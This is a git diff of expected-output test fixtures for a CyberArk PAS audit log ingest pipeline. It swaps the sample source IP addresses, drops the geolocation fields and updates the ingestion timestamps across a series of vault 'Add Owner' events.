"\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"DR Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101454Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"DR Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -601,20 +517,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -635,7 +539,7 @@ "Notification Engines" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -644,7 +548,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Notification Engines", "message": "Add Owner", @@ -658,8 +562,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021050700Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Notification Engines\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101458100Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Notification Engines\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -686,20 +590,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -720,7 +612,7 @@ "PSMPApp_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -729,7 +621,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:22Z", "safe": "PVWAConfig", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMPApp_localhost.localdomain", "message": "Add Owner", @@ -743,8 +635,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021052900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101462400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -771,20 +663,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -805,7 +685,7 @@ "PSMAppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -814,7 +694,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:23Z", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMAppUsers", "message": "Add Owner", @@ -828,8 +708,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021055100Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101467400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -856,20 +736,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -890,7 +758,7 @@ "Vault Admins" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -899,7 +767,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:23Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Vault Admins", "message": "Add Owner", @@ -913,8 +781,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021057400Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101472Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -941,20 +809,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -975,7 +831,7 @@ "PVWAAppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -984,7 +840,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:23Z", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PVWAAppUsers", "message": "Add Owner", @@ -998,8 +854,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021059600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101475500Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -1026,20 +882,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1060,7 +904,7 @@ "PVWAGWAccounts" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -1069,7 +913,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:36Z", "safe": "PSMPADBUserProfile", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PVWAGWAccounts", "message": "Add Owner", @@ -1083,8 +927,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021061900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:36\",\"IsoTimestamp\":\"2021-03-10T09:11:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBUserProfile\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101479900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:36\",\"IsoTimestamp\":\"2021-03-10T09:11:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBUserProfile\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -1111,20 +955,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1145,7 +977,7 @@ "PSMP_ADB_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -1154,7 +986,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:37Z", "safe": "PSMPADBridgeConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMP_ADB_localhost.localdomain", "message": "Add Owner", @@ -1168,8 +1000,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021064100Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:37\",\"IsoTimestamp\":\"2021-03-10T09:11:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101485300Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:37\",\"IsoTimestamp\":\"2021-03-10T09:11:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -1196,20 +1028,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1230,7 +1050,7 @@ "PSMP_ADB_AppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -1239,7 +1059,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:38Z", "safe": "PSMPADBridgeCustom", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMP_ADB_AppUsers", "message": "Add Owner", @@ -1253,8 +1073,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021066500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:38\",\"IsoTimestamp\":\"2021-03-10T09:11:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeCustom\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101490600Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:38\",\"IsoTimestamp\":\"2021-03-10T09:11:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeCustom\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", @@ -1281,20 +1101,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1315,7 +1123,7 @@ "PSMApp_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -1324,7 +1132,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:32Z", "safe": "PVWAConfig", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMApp_VAGRANT", "message": "Add Owner", @@ -1338,8 +1146,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021068800Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:32\",\"IsoTimestamp\":\"2021-03-10T17:59:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101494300Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:32\",\"IsoTimestamp\":\"2021-03-10T17:59:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json index 530242c2c3a..f340629aac8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json @@ -59,7 +59,7 @@ "event": { "severity": 2, "action": "cpm auto-detection start", - "ingested": "2021-06-09T10:24:33.411730200Z", + "ingested": "2021-12-09T13:36:57.093060600Z", "original": "\u003c5\u003e1 2021-03-11T16:21:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:21:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:21:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e326\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Auto-detection Start\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Auto-detection Start\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePasswordManager_info\u003c/Safe\u003e\\n \u003cFile\u003e \u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e \u003c/Reason\u003e\\n \u003cExtraDetails\u003eADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\u003c/ExtraDetails\u003e\\n 